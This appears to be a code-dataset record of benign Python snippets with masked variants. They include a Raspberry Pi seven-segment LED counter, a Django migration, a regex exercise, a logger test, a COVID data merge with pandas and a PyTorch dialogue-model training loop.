if contador == 0:\n contador = 99\n else:\n contador = contador - 1\n print('Numero actual = ' + str(contador))\n createNumber2Leds(led1, led2, contador)\n time.sleep(0.3)\n\n\ndef main():\n setupLed1()\n setupLed2()\n turnOffAllLeds()\n try:\n print('Presione un boton para continuar')\n digiTurno()\n except (KeyboardInterrupt, SystemExit):\n GPIO.cleanup()\n\n\n<mask token>\n",
"step-3": "<mask token>\nGPIO.setmode(GPIO.BOARD)\nGPIO.setwarnings(False)\nGPIO.setup(reset, GPIO.IN)\nGPIO.setup(minus, GPIO.IN)\nGPIO.setup(more, GPIO.IN)\n\n\ndef setupLed1():\n for port in led1:\n GPIO.setup(port[1], GPIO.OUT)\n\n\ndef setupLed2():\n for port in led2:\n GPIO.setup(port[1], GPIO.OUT)\n\n\ndef statusLed(port, status):\n GPIO.output(port, status)\n\n\ndef turnOnAllLeds():\n for led in led1:\n statusLed(led[1], True)\n for led in led2:\n statusLed(led[1], True)\n\n\ndef turnOffAllLeds():\n for led in led1:\n statusLed(led[1], False)\n for led in led2:\n statusLed(led[1], False)\n\n\ndef turnOffOneLed(led):\n for port in led:\n statusLed(port[1], False)\n\n\ndef createNumber(ledNumber, number):\n turnOffOneLed(ledNumber)\n for i in range(10):\n if number == i:\n for letter in numbers[i]:\n for led in ledNumber:\n if led[0] == letter:\n statusLed(led[1], True)\n\n\ndef createNumber2Leds(led1, led2, number):\n if number < 10:\n createNumber(led1, 0)\n createNumber(led2, number)\n else:\n decenas = number / 10\n unidades = number % 10\n createNumber(led1, decenas)\n createNumber(led2, unidades)\n\n\ndef titileoNumber2Leds(led1, led2, number):\n for i in range(3):\n turnOffAllLeds()\n time.sleep(0.25)\n createNumber2Leds(led1, led2, number)\n time.sleep(0.25)\n\n\ndef digiTurno():\n contador = 0\n titileoNumber2Leds(led1, led2, contador)\n while True:\n if GPIO.input(reset):\n contador = 0\n print('-' * 20 + ' RESET ' + '-' * 20)\n print(datetime.now())\n titileoNumber2Leds(led1, led2, contador)\n print('Numero actual = ' + str(contador))\n time.sleep(0.3)\n if GPIO.input(more):\n if contador < 99:\n contador += 1\n else:\n print(datetime.now())\n contador = 0\n print('Numero actual = ' + str(contador))\n createNumber2Leds(led1, led2, contador)\n time.sleep(0.3)\n if GPIO.input(minus):\n if contador == 0:\n contador = 99\n else:\n contador = contador - 1\n print('Numero actual = ' + str(contador))\n createNumber2Leds(led1, led2, contador)\n time.sleep(0.3)\n\n\ndef main():\n setupLed1()\n setupLed2()\n turnOffAllLeds()\n try:\n print('Presione un boton para continuar')\n digiTurno()\n except (KeyboardInterrupt, SystemExit):\n GPIO.cleanup()\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "<mask token>\nled1 = [('g', 40), ('f', 38), ('a', 36), ('b', 32), ('e', 26), ('d', 24), (\n 'c', 22)]\nled2 = [('g', 19), ('f', 15), ('a', 13), ('b', 11), ('e', 7), ('d', 5), (\n 'c', 3)]\nnumbers = [('a', 'b', 'c', 'd', 'e', 'f'), ('b', 'c'), ('a', 'b', 'g', 'e',\n 'd'), ('a', 'b', 'g', 'c', 'd'), ('f', 'g', 'b', 'c'), ('a', 'f', 'g',\n 'c', 'd'), ('a', 'f', 'g', 'c', 'd', 'e'), ('a', 'b', 'c'), ('a', 'b',\n 'c', 'd', 'e', 'f', 'g'), ('a', 'b', 'c', 'd', 'f', 'g')]\nreset = 12\nminus = 16\nmore = 18\nGPIO.setmode(GPIO.BOARD)\nGPIO.setwarnings(False)\nGPIO.setup(reset, GPIO.IN)\nGPIO.setup(minus, GPIO.IN)\nGPIO.setup(more, GPIO.IN)\n\n\ndef setupLed1():\n for port in led1:\n GPIO.setup(port[1], GPIO.OUT)\n\n\ndef setupLed2():\n for port in led2:\n GPIO.setup(port[1], GPIO.OUT)\n\n\ndef statusLed(port, status):\n GPIO.output(port, status)\n\n\ndef turnOnAllLeds():\n for led in led1:\n statusLed(led[1], True)\n for led in led2:\n statusLed(led[1], True)\n\n\ndef turnOffAllLeds():\n for led in led1:\n statusLed(led[1], False)\n for led in led2:\n statusLed(led[1], False)\n\n\ndef turnOffOneLed(led):\n for port in led:\n statusLed(port[1], False)\n\n\ndef createNumber(ledNumber, number):\n turnOffOneLed(ledNumber)\n for i in range(10):\n if number == i:\n for letter in numbers[i]:\n for led in ledNumber:\n if led[0] == letter:\n statusLed(led[1], True)\n\n\ndef createNumber2Leds(led1, led2, number):\n if number < 10:\n createNumber(led1, 0)\n createNumber(led2, number)\n else:\n decenas = number / 10\n unidades = number % 10\n createNumber(led1, decenas)\n createNumber(led2, unidades)\n\n\ndef titileoNumber2Leds(led1, led2, number):\n for i in range(3):\n turnOffAllLeds()\n time.sleep(0.25)\n createNumber2Leds(led1, led2, number)\n time.sleep(0.25)\n\n\ndef digiTurno():\n contador = 0\n titileoNumber2Leds(led1, led2, contador)\n while True:\n if GPIO.input(reset):\n contador = 0\n print('-' * 20 + ' RESET ' + '-' * 20)\n print(datetime.now())\n titileoNumber2Leds(led1, led2, contador)\n print('Numero actual = ' + str(contador))\n time.sleep(0.3)\n if GPIO.input(more):\n if contador < 99:\n contador += 1\n else:\n print(datetime.now())\n contador = 0\n print('Numero actual = ' + str(contador))\n createNumber2Leds(led1, led2, contador)\n time.sleep(0.3)\n if GPIO.input(minus):\n if contador == 0:\n contador = 99\n else:\n contador = contador - 1\n print('Numero actual = ' + str(contador))\n createNumber2Leds(led1, led2, contador)\n time.sleep(0.3)\n\n\ndef main():\n setupLed1()\n setupLed2()\n turnOffAllLeds()\n try:\n print('Presione un boton para continuar')\n digiTurno()\n except (KeyboardInterrupt, SystemExit):\n GPIO.cleanup()\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "import RPi.GPIO as GPIO\nimport time\nfrom datetime import datetime\n\nled1 = [('g', 40), ('f', 38), ('a', 36), ('b', 32),\n ('e', 26), ('d', 24), ('c', 22)]\nled2 = [('g', 19), ('f', 15), ('a', 13),\n ('b', 11), ('e', 7), ('d', 5), ('c', 3)]\nnumbers = [\n ('a', 'b', 'c', 'd', 'e', 'f'),\n ('b', 'c'),\n ('a', 'b', 'g', 'e', 'd'),\n ('a', 'b', 'g', 'c', 'd'),\n ('f', 'g', 'b', 'c'),\n ('a', 'f', 'g', 'c', 'd'),\n ('a', 'f', 'g', 'c', 'd', 'e'),\n ('a', 'b', 'c'),\n ('a', 'b', 'c', 'd', 'e', 'f', 'g'),\n ('a', 'b', 'c', 'd', 'f', 'g')\n]\n\nreset = 12\nminus = 16\nmore = 18\n\nGPIO.setmode(GPIO.BOARD)\nGPIO.setwarnings(False)\nGPIO.setup(reset, GPIO.IN)\nGPIO.setup(minus, GPIO.IN)\nGPIO.setup(more, GPIO.IN)\n\n\ndef setupLed1():\n for port in led1:\n GPIO.setup(port[1], GPIO.OUT)\n\n\ndef setupLed2():\n for port in led2:\n GPIO.setup(port[1], GPIO.OUT)\n\n\ndef statusLed(port, status):\n GPIO.output(port, status)\n\n\ndef turnOnAllLeds():\n for led in led1:\n statusLed(led[1], True)\n for led in led2:\n statusLed(led[1], True)\n\n\ndef turnOffAllLeds():\n for led in led1:\n statusLed(led[1], False)\n for led in led2:\n statusLed(led[1], False)\n\n\ndef turnOffOneLed(led):\n for port in led:\n statusLed(port[1], False)\n\n\ndef createNumber(ledNumber, number):\n turnOffOneLed(ledNumber)\n for i in range(10):\n if number == i:\n for letter in numbers[i]:\n for led in ledNumber:\n if led[0] == letter:\n statusLed(led[1], True)\n\n\ndef createNumber2Leds(led1, led2, number):\n if number < 10:\n createNumber(led1, 0)\n createNumber(led2, number)\n else:\n decenas = number / 10\n unidades = number % 10\n createNumber(led1, decenas)\n createNumber(led2, unidades)\n\n\ndef titileoNumber2Leds(led1, led2, number):\n for i in range(3):\n turnOffAllLeds()\n time.sleep(0.25)\n createNumber2Leds(led1, led2, number)\n time.sleep(0.25)\n\n\ndef digiTurno():\n contador = 0\n titileoNumber2Leds(led1, led2, contador)\n while True:\n if GPIO.input(reset):\n contador = 0\n print(\"-\"*20+\" RESET \"+\"-\"*20)\n print(datetime.now())\n titileoNumber2Leds(led1, led2, contador)\n print(\"Numero actual = \"+str(contador))\n time.sleep(.3)\n if GPIO.input(more):\n if contador < 99:\n contador += 1\n else:\n print(datetime.now())\n contador = 0\n print(\"Numero actual = \"+str(contador))\n createNumber2Leds(led1, led2, contador)\n time.sleep(.3)\n if GPIO.input(minus):\n if contador == 0:\n contador = 99\n else:\n contador = contador-1\n print(\"Numero actual = \"+str(contador))\n createNumber2Leds(led1, led2, contador)\n time.sleep(.3)\n\n\ndef main():\n setupLed1()\n setupLed2()\n turnOffAllLeds()\n try:\n print(\"Presione un boton para continuar\")\n digiTurno()\n except (KeyboardInterrupt, SystemExit):\n GPIO.cleanup()\n\n\nif __name__ == \"__main__\":\n main()\n",
"step-ids": [
10,
11,
12,
13,
15
]
}
|
[
10,
11,
12,
13,
15
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
dependencies = [('challenges', '0019_auto_20170310_1114')]
operations = [migrations.AddField(model_name='challenge', name=
'supported_languages', field=models.ManyToManyField(to=
'challenges.Language'))]
<|reserved_special_token_1|>
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [('challenges', '0019_auto_20170310_1114')]
operations = [migrations.AddField(model_name='challenge', name=
'supported_languages', field=models.ManyToManyField(to=
'challenges.Language'))]
<|reserved_special_token_1|>
# -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-03-15 15:20
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('challenges', '0019_auto_20170310_1114'),
]
operations = [
migrations.AddField(
model_name='challenge',
name='supported_languages',
field=models.ManyToManyField(to='challenges.Language'),
),
]
|
flexible
|
{
"blob_id": "6b7ff00eb9a5d0837def5b245ba2d4a0acec972e",
"index": 3466,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('challenges', '0019_auto_20170310_1114')]\n operations = [migrations.AddField(model_name='challenge', name=\n 'supported_languages', field=models.ManyToManyField(to=\n 'challenges.Language'))]\n",
"step-4": "from __future__ import unicode_literals\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [('challenges', '0019_auto_20170310_1114')]\n operations = [migrations.AddField(model_name='challenge', name=\n 'supported_languages', field=models.ManyToManyField(to=\n 'challenges.Language'))]\n",
"step-5": "# -*- coding: utf-8 -*-\n# Generated by Django 1.10.5 on 2017-03-15 15:20\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('challenges', '0019_auto_20170310_1114'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='challenge',\n name='supported_languages',\n field=models.ManyToManyField(to='challenges.Language'),\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
print(str(bool(re.search(regex, raw_input()))).lower())
<|reserved_special_token_1|>
<|reserved_special_token_0|>
regex = '^\\d{2}(-?)\\d{2}\\1\\d{2}\\1\\d{2}$'
<|reserved_special_token_0|>
print(str(bool(re.search(regex, raw_input()))).lower())
<|reserved_special_token_1|>
<|reserved_special_token_0|>
regex = '^\\d{2}(-?)\\d{2}\\1\\d{2}\\1\\d{2}$'
import re
print(str(bool(re.search(regex, raw_input()))).lower())
<|reserved_special_token_1|>
'''
Created on 13 Dec 2016
@author: hpcosta
'''
# https://www.hackerrank.com/challenges/backreferences-to-failed-groups
regex = r"^\d{2}(-?)\d{2}\1\d{2}\1\d{2}$" # Do not delete 'r'.
import re
print(str(bool(re.search(regex, raw_input()))).lower())
# Task
#
# You have a test string S.
# Your task is to write a regex which will match S, with following condition(s):
#
# S consists of 8 digits.
# S may have "-" separator such that string S gets divided in 4 parts, with each part having exactly two digits. (Eg. 12-34-56-78)
# Valid
#
# 12345678
# 12-34-56-87
# Invalid
#
# 1-234-56-78
# 12-45-7810
|
flexible
|
{
"blob_id": "e884ce5878de75afe93085e2310b4b8d5953963a",
"index": 337,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(str(bool(re.search(regex, raw_input()))).lower())\n",
"step-3": "<mask token>\nregex = '^\\\\d{2}(-?)\\\\d{2}\\\\1\\\\d{2}\\\\1\\\\d{2}$'\n<mask token>\nprint(str(bool(re.search(regex, raw_input()))).lower())\n",
"step-4": "<mask token>\nregex = '^\\\\d{2}(-?)\\\\d{2}\\\\1\\\\d{2}\\\\1\\\\d{2}$'\nimport re\nprint(str(bool(re.search(regex, raw_input()))).lower())\n",
"step-5": "'''\nCreated on 13 Dec 2016\n\n@author: hpcosta\n'''\n# https://www.hackerrank.com/challenges/backreferences-to-failed-groups\n\nregex = r\"^\\d{2}(-?)\\d{2}\\1\\d{2}\\1\\d{2}$\" # Do not delete 'r'.\n\nimport re\n\nprint(str(bool(re.search(regex, raw_input()))).lower())\n\n\n\n# Task\n# \n# You have a test string S. \n# Your task is to write a regex which will match S, with following condition(s):\n# \n# S consists of 8 digits.\n# S may have \"-\" separator such that string S gets divided in 4 parts, with each part having exactly two digits. (Eg. 12-34-56-78)\n# Valid \n# \n# 12345678\n# 12-34-56-87\n# Invalid \n# \n# 1-234-56-78\n# 12-45-7810",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class LoggerTestCase(TestCase):
def test_flag_value(self):
self.assertEqual(SUCCESS, '\x1b[34mSUCCESS\x1b[0m')
self.assertEqual(FAILURE, '\x1b[31mFAILURE\x1b[0m')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class LoggerTestCase(TestCase):
def test_flag_value(self):
self.assertEqual(SUCCESS, '\x1b[34mSUCCESS\x1b[0m')
self.assertEqual(FAILURE, '\x1b[31mFAILURE\x1b[0m')
def test_logger(self):
msg = 'test'
self.assertEqual(logger.info(msg), '\x1b[97m[~] \x1b[0mtest')
self.assertEqual(logger.info(msg, SUCCESS),
'\x1b[97m[~] \x1b[0m\x1b[34mSUCCESS\x1b[0m test')
self.assertEqual(logger.warn(msg), '\x1b[33m[!] \x1b[0mtest')
self.assertEqual(logger.error(msg), '\x1b[31m[-] \x1b[0mtest')
self.assertEqual(logger.error(msg, FAILURE),
'\x1b[31m[-] \x1b[0m\x1b[31mFAILURE\x1b[0m test')
<|reserved_special_token_1|>
from unittest import TestCase
from optimoida.logging import SUCCESS, FAILURE, logger
class LoggerTestCase(TestCase):
def test_flag_value(self):
self.assertEqual(SUCCESS, '\x1b[34mSUCCESS\x1b[0m')
self.assertEqual(FAILURE, '\x1b[31mFAILURE\x1b[0m')
def test_logger(self):
msg = 'test'
self.assertEqual(logger.info(msg), '\x1b[97m[~] \x1b[0mtest')
self.assertEqual(logger.info(msg, SUCCESS),
'\x1b[97m[~] \x1b[0m\x1b[34mSUCCESS\x1b[0m test')
self.assertEqual(logger.warn(msg), '\x1b[33m[!] \x1b[0mtest')
self.assertEqual(logger.error(msg), '\x1b[31m[-] \x1b[0mtest')
self.assertEqual(logger.error(msg, FAILURE),
'\x1b[31m[-] \x1b[0m\x1b[31mFAILURE\x1b[0m test')
<|reserved_special_token_1|>
#!/usr/bin/env python
# coding: utf-8
from unittest import TestCase
from optimoida.logging import (
SUCCESS, FAILURE, logger)
class LoggerTestCase(TestCase):
def test_flag_value(self):
self.assertEqual(SUCCESS, "\x1b[34mSUCCESS\x1b[0m")
self.assertEqual(FAILURE, "\x1b[31mFAILURE\x1b[0m")
def test_logger(self):
msg = "test"
self.assertEqual(logger.info(msg), "\x1b[97m[~] \x1b[0mtest")
self.assertEqual(
logger.info(msg, SUCCESS),
"\x1b[97m[~] \x1b[0m\x1b[34mSUCCESS\x1b[0m test")
self.assertEqual(logger.warn(msg), "\x1b[33m[!] \x1b[0mtest")
self.assertEqual(logger.error(msg), "\x1b[31m[-] \x1b[0mtest")
self.assertEqual(
logger.error(msg, FAILURE),
"\x1b[31m[-] \x1b[0m\x1b[31mFAILURE\x1b[0m test")
|
flexible
|
{
"blob_id": "ac8c8dc4bcccef7942dd48d54902e13e811f950c",
"index": 5059,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass LoggerTestCase(TestCase):\n\n def test_flag_value(self):\n self.assertEqual(SUCCESS, '\\x1b[34mSUCCESS\\x1b[0m')\n self.assertEqual(FAILURE, '\\x1b[31mFAILURE\\x1b[0m')\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass LoggerTestCase(TestCase):\n\n def test_flag_value(self):\n self.assertEqual(SUCCESS, '\\x1b[34mSUCCESS\\x1b[0m')\n self.assertEqual(FAILURE, '\\x1b[31mFAILURE\\x1b[0m')\n\n def test_logger(self):\n msg = 'test'\n self.assertEqual(logger.info(msg), '\\x1b[97m[~] \\x1b[0mtest')\n self.assertEqual(logger.info(msg, SUCCESS),\n '\\x1b[97m[~] \\x1b[0m\\x1b[34mSUCCESS\\x1b[0m test')\n self.assertEqual(logger.warn(msg), '\\x1b[33m[!] \\x1b[0mtest')\n self.assertEqual(logger.error(msg), '\\x1b[31m[-] \\x1b[0mtest')\n self.assertEqual(logger.error(msg, FAILURE),\n '\\x1b[31m[-] \\x1b[0m\\x1b[31mFAILURE\\x1b[0m test')\n",
"step-4": "from unittest import TestCase\nfrom optimoida.logging import SUCCESS, FAILURE, logger\n\n\nclass LoggerTestCase(TestCase):\n\n def test_flag_value(self):\n self.assertEqual(SUCCESS, '\\x1b[34mSUCCESS\\x1b[0m')\n self.assertEqual(FAILURE, '\\x1b[31mFAILURE\\x1b[0m')\n\n def test_logger(self):\n msg = 'test'\n self.assertEqual(logger.info(msg), '\\x1b[97m[~] \\x1b[0mtest')\n self.assertEqual(logger.info(msg, SUCCESS),\n '\\x1b[97m[~] \\x1b[0m\\x1b[34mSUCCESS\\x1b[0m test')\n self.assertEqual(logger.warn(msg), '\\x1b[33m[!] \\x1b[0mtest')\n self.assertEqual(logger.error(msg), '\\x1b[31m[-] \\x1b[0mtest')\n self.assertEqual(logger.error(msg, FAILURE),\n '\\x1b[31m[-] \\x1b[0m\\x1b[31mFAILURE\\x1b[0m test')\n",
"step-5": "#!/usr/bin/env python\n# coding: utf-8\n\nfrom unittest import TestCase\nfrom optimoida.logging import (\n SUCCESS, FAILURE, logger)\n\n\nclass LoggerTestCase(TestCase):\n\n def test_flag_value(self):\n\n self.assertEqual(SUCCESS, \"\\x1b[34mSUCCESS\\x1b[0m\")\n self.assertEqual(FAILURE, \"\\x1b[31mFAILURE\\x1b[0m\")\n\n def test_logger(self):\n\n msg = \"test\"\n\n self.assertEqual(logger.info(msg), \"\\x1b[97m[~] \\x1b[0mtest\")\n self.assertEqual(\n logger.info(msg, SUCCESS),\n \"\\x1b[97m[~] \\x1b[0m\\x1b[34mSUCCESS\\x1b[0m test\")\n\n self.assertEqual(logger.warn(msg), \"\\x1b[33m[!] \\x1b[0mtest\")\n\n self.assertEqual(logger.error(msg), \"\\x1b[31m[-] \\x1b[0mtest\")\n self.assertEqual(\n logger.error(msg, FAILURE),\n \"\\x1b[31m[-] \\x1b[0m\\x1b[31mFAILURE\\x1b[0m test\")\n",
"step-ids": [
0,
2,
3,
4,
5
]
}
|
[
0,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def extremes(nums):
return max(nums), min(nums)
<|reserved_special_token_1|>
# *Using Min & Max Exercise
def extremes(nums):
return (max(nums), min(nums))
|
flexible
|
{
"blob_id": "0577c274672bac333500535f21f568ade62100c7",
"index": 3580,
"step-1": "<mask token>\n",
"step-2": "def extremes(nums):\n return max(nums), min(nums)\n",
"step-3": "\n# *Using Min & Max Exercise\ndef extremes(nums):\n return (max(nums), min(nums))\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
import pandas as pd
import notification
def modify(nyt_url, jh_url):
# read data from both sources into a dataframe
# remove unwanted data, formats, and filters
# join dataframes on index
try:
nyt_df = pd.read_csv(nyt_url,
header=0,
names=['Date', 'Cases', 'Deaths'],
dtype={'Cases': 'Int64', 'Deaths': 'Int64'})
nyt_df['Date'] = pd.to_datetime(nyt_df['Date'], format="%Y-%m-%d")
except:
alert = "Error with NYT link"
notification.send_sns(alert)
print(alert)
try:
jh_df = pd.read_csv(jh_url,
usecols=['Date', 'Country/Region', 'Recovered'],
dtype={'Recovered': 'Int64'},
encoding='utf8').dropna()
jh_df.rename(columns={'Country/Region': 'Country'}, inplace=True)
jh_df['Date'] = pd.to_datetime(jh_df['Date'], format="%Y-%m-%d")
except:
alert = "Error with JH link"
notification.send_sns(alert)
print(alert)
try:
jh_us_filter = jh_df[jh_df.Country == 'US']
covid_df = nyt_df.set_index('Date').join(
jh_us_filter.set_index('Date')).dropna()
covid_df.reset_index(inplace=True)
covid_df['Date'] = covid_df['Date'].dt.strftime('%Y-%m-%d')
return covid_df
except:
alert = "Error joining data"
notification.send_sns(alert)
print(alert)
|
normal
|
{
"blob_id": "c60971b3b0649fce8c435813de4a738f4eacda27",
"index": 4377,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef modify(nyt_url, jh_url):\n try:\n nyt_df = pd.read_csv(nyt_url, header=0, names=['Date', 'Cases',\n 'Deaths'], dtype={'Cases': 'Int64', 'Deaths': 'Int64'})\n nyt_df['Date'] = pd.to_datetime(nyt_df['Date'], format='%Y-%m-%d')\n except:\n alert = 'Error with NYT link'\n notification.send_sns(alert)\n print(alert)\n try:\n jh_df = pd.read_csv(jh_url, usecols=['Date', 'Country/Region',\n 'Recovered'], dtype={'Recovered': 'Int64'}, encoding='utf8'\n ).dropna()\n jh_df.rename(columns={'Country/Region': 'Country'}, inplace=True)\n jh_df['Date'] = pd.to_datetime(jh_df['Date'], format='%Y-%m-%d')\n except:\n alert = 'Error with JH link'\n notification.send_sns(alert)\n print(alert)\n try:\n jh_us_filter = jh_df[jh_df.Country == 'US']\n covid_df = nyt_df.set_index('Date').join(jh_us_filter.set_index('Date')\n ).dropna()\n covid_df.reset_index(inplace=True)\n covid_df['Date'] = covid_df['Date'].dt.strftime('%Y-%m-%d')\n return covid_df\n except:\n alert = 'Error joining data'\n notification.send_sns(alert)\n print(alert)\n",
"step-3": "import pandas as pd\nimport notification\n\n\ndef modify(nyt_url, jh_url):\n try:\n nyt_df = pd.read_csv(nyt_url, header=0, names=['Date', 'Cases',\n 'Deaths'], dtype={'Cases': 'Int64', 'Deaths': 'Int64'})\n nyt_df['Date'] = pd.to_datetime(nyt_df['Date'], format='%Y-%m-%d')\n except:\n alert = 'Error with NYT link'\n notification.send_sns(alert)\n print(alert)\n try:\n jh_df = pd.read_csv(jh_url, usecols=['Date', 'Country/Region',\n 'Recovered'], dtype={'Recovered': 'Int64'}, encoding='utf8'\n ).dropna()\n jh_df.rename(columns={'Country/Region': 'Country'}, inplace=True)\n jh_df['Date'] = pd.to_datetime(jh_df['Date'], format='%Y-%m-%d')\n except:\n alert = 'Error with JH link'\n notification.send_sns(alert)\n print(alert)\n try:\n jh_us_filter = jh_df[jh_df.Country == 'US']\n covid_df = nyt_df.set_index('Date').join(jh_us_filter.set_index('Date')\n ).dropna()\n covid_df.reset_index(inplace=True)\n covid_df['Date'] = covid_df['Date'].dt.strftime('%Y-%m-%d')\n return covid_df\n except:\n alert = 'Error joining data'\n notification.send_sns(alert)\n print(alert)\n",
"step-4": "import pandas as pd\nimport notification\n\n\ndef modify(nyt_url, jh_url):\n # read data from both sources into a dataframe\n # remove unwanted data, formats, and filters\n # join dataframes on index\n try:\n nyt_df = pd.read_csv(nyt_url,\n header=0,\n names=['Date', 'Cases', 'Deaths'],\n dtype={'Cases': 'Int64', 'Deaths': 'Int64'})\n nyt_df['Date'] = pd.to_datetime(nyt_df['Date'], format=\"%Y-%m-%d\")\n except:\n alert = \"Error with NYT link\"\n notification.send_sns(alert)\n print(alert)\n\n try:\n jh_df = pd.read_csv(jh_url,\n usecols=['Date', 'Country/Region', 'Recovered'],\n dtype={'Recovered': 'Int64'},\n encoding='utf8').dropna()\n jh_df.rename(columns={'Country/Region': 'Country'}, inplace=True)\n jh_df['Date'] = pd.to_datetime(jh_df['Date'], format=\"%Y-%m-%d\")\n except:\n alert = \"Error with JH link\"\n notification.send_sns(alert)\n print(alert)\n\n try:\n jh_us_filter = jh_df[jh_df.Country == 'US']\n covid_df = nyt_df.set_index('Date').join(\n jh_us_filter.set_index('Date')).dropna()\n covid_df.reset_index(inplace=True)\n covid_df['Date'] = covid_df['Date'].dt.strftime('%Y-%m-%d')\n return covid_df\n except:\n alert = \"Error joining data\"\n notification.send_sns(alert)\n print(alert)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import os
import math
import time
from tqdm import tqdm
import torch
from torch import nn
import torch.optim as optim
from torch.nn import functional as F
from torch.nn.utils import clip_grad_norm_
from torch.utils.data import DataLoader
from nag.modules import Transformer, TransformerTorch
from nag.logger import LogManager, SummaryHelper
from nag.metric import BLEUMetric, DistinctNGram
from nag.vocab_helper import VocabBulider
from nag.utils import PadCollate, get_index, restore_best_state, init_seed
from nag.dataset import OpenSubDataset, IMSDBDataset
from nag.optimizer import RAdam
from nag.options import parse_args
from nag.criterion import similarity_regularization, LabelSmoothedCrossEntropyLoss
def train(epoch, model, dataloader, criterion, optimizer, scheduler):
global global_train_step
model.train()
total_loss = 0.
bleu_score = 0.
distinct_1_score, distinct_2_score = 0., 0.
for i, (src, tgt, src_lens, tgt_lens) in tqdm(enumerate(dataloader, 0), desc='train', total=len(opensub_dataset)//opt.realbatch):
tgt_input = tgt[:, :-1]
tgt_gold = tgt[:, 1:]
tgt_lens = tgt_lens - 1
decoder_output_probs, _ = model(
src=src, tgt=tgt_input, src_lengths=src_lens, tgt_lengths=tgt_lens)
decoder_output_probs_T = decoder_output_probs.permute(0, 2, 1)
out_seqs = torch.argmax(decoder_output_probs, dim=2)
# loss
loss = criterion(decoder_output_probs_T, tgt_gold) / ACCUMULATION
loss.backward()
total_loss += loss.item()
# calculate metrics
bleu_score += bleu_metirc(tgt_gold, out_seqs, tgt_lens)
distinct_1_score += distinct_1(out_seqs, tgt_lens)
distinct_2_score += distinct_2(out_seqs, tgt_lens)
# summary writer
global_train_step += 1
writer.log_loss(loss.item()*ACCUMULATION, mode='train')
if (i+1) % ACCUMULATION == 0:
# clip_grad_norm_(model.parameters(), max_norm=5)
optimizer.step()
optimizer.zero_grad()
scheduler.step()
if (i+1) % opt.logstep == 0:
avg_loss = (total_loss / opt.logstep) * ACCUMULATION
avg_bleu = bleu_score / opt.logstep
avg_distinct_1 = distinct_1_score / opt.logstep
avg_distinct_2 = distinct_2_score / opt.logstep
mylogger.log(
i, epoch, model, value=avg_loss, is_train=True,
info=f'loss: {avg_loss:.4f} | ppl: {math.exp(avg_loss):.4f} | BLEU: {avg_bleu:.5f} | d1: {avg_distinct_1:.3f} | d2: {avg_distinct_2:.3f}')
total_loss = 0.
bleu_score = 0.
distinct_1_score, distinct_2_score = 0., 0.
show_gen_seq(src[:2], out_seqs[:2], tgt_lens[:2], tgt_gold[:2], vocab_bulider, global_train_step, mode='train')
def eval(epoch, model, dataloader, criterion, beam_size=2):
global global_valid_step
model.eval()
criterion.eval()
total_loss = 0.
bleu_score = 0.
distinct_1_score, distinct_2_score = 0., 0.
fout = open(os.path.join('./save/' + model_name + '/', model_name + '_' + str(epoch)), 'w', encoding='utf-8')
with torch.no_grad():
for i, (src, tgt, src_lens, tgt_lens) in tqdm(enumerate(dataloader, 0), desc='eval', total=len(imsdb_dataset)):
tgt_begin = torch.LongTensor([[vocab_bulider['<bos>']]]).to(device)
tgt_gold = tgt[:, 1:]
if beam_size > 1:
output_seqs, output_probs = model.beam_search(
src=src, tgt_begin=tgt_begin, src_length=src_lens,
eos_token_id=vocab_bulider['<eos>'], beam_size=beam_size, max_length=tgt_lens.item())
else:
output_seqs, output_probs = model.greedy(
src=src, tgt_begin=tgt_begin, src_length=src_lens,
eos_token_id=vocab_bulider['<eos>'], max_length=tgt_lens.item())
min_len = min(tgt_gold.shape[1], output_seqs.shape[1])
# loss
loss = criterion(output_probs[:, :min_len, :].permute(0, 2, 1), tgt_gold[:, :min_len])
total_loss += loss.item()
# calculate metrics
out_lens = [min_len]
bleu_score += bleu_metirc(tgt_gold, output_seqs, out_lens)
distinct_1_score += distinct_1(output_seqs, out_lens)
distinct_2_score += distinct_2(output_seqs, out_lens)
# show sequence
global_valid_step += 1
fout.write(' '.join(convert_ids_to_seq(output_seqs[0], vocab_bulider)) + '\n')
if (i+1) % opt.logstep == 0:
show_gen_seq(src, output_seqs, out_lens, tgt_gold, vocab_bulider, global_valid_step, mode='valid')
# summary
avg_loss = total_loss / i
avg_bleu = bleu_score / i
avg_distinct_1 = distinct_1_score / i
avg_distinct_2 = distinct_2_score / i
writer.log_loss(avg_loss, mode='valid')
mylogger.log(
i, epoch, model, value=avg_bleu, is_train=False,
info=f'loss: {avg_loss:.4f} | ppl: {math.exp(avg_loss):.4f} | BLEU: {avg_bleu:.5f} | d1: {avg_distinct_1:.3f} | d2: {avg_distinct_2:.3f}')
fout.close()
